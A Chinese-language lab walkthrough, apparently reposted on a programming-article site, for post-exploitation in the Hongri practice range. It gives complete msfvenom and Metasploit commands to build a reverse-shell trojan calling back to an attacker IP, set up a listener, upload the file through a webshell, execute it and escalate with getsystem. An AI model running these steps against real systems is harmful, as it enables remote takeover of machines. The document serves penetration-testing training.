本文主要是介绍红日靶场----(四)1.后渗透利用阶段,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
使用Metasploit进入后渗透利用阶段
一旦我们获取了目标主机的访问权限,我们就可以进入后渗透利用阶段,在这个阶段我们收集信息,采取措施维护我们的访问权限,转向其他机器
Step01:上线MSF(通过metasploit获取目标系统的会话-即SHELL)
常用选项-p //指定生成的Payload--list payload //列出所支持的Payload类型--list-options //查看模块所支持的选项msfvenom -p windows/meterpreter/reverse_tcp --list-options //查看模块所支持的选项-f //指定生成的文件格式msfvenom --list formats //查看所支持的文件格式常用的Windows Payload:windows/meterpreter/reverse_tcp(使用meteperter模块,建立一个反向的TCP连接)windows/meterpreter_reverse_tcpwindows/x64/meterpreter/reverse_tcp
1、生成反向木马
使用msfvenom生成一个木马程序 (msfvenom是有效载荷(payload)生成工具和编码工具的结合)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.195.20 LPORT=1234 -f exe > shell.exe
2、在kali端创建侦听器
msf中相应的模块:exploit/multi/handler
模块中所使用的payload应该与msfvenom中的payload保持一致
可以把命令写入到一个文件中,MSF
msfconsole -r
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.195.20
set LPORT 1234
set AutoRunScript post/windows/manage/migrate
exploit -j -z
然后使用 -r指定文件名,这样下次就不用一个一个写入了。
3、把生成的shell.exe上传(部署)目标系统
通过蚁剑上传使用msfvenom生成的反向木马
(1)选中目标主机后右击
(2)进入文件系统后点击上传
(3)找到反向木马后上传
4、 执行木马
dir看一下是否传输成功
直接执行该文件
这时候我们返回到MSF中就可以看到了,这时候我们可以使用getsystem直接提权。
这篇关于红日靶场----(四)1.后渗透利用阶段的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!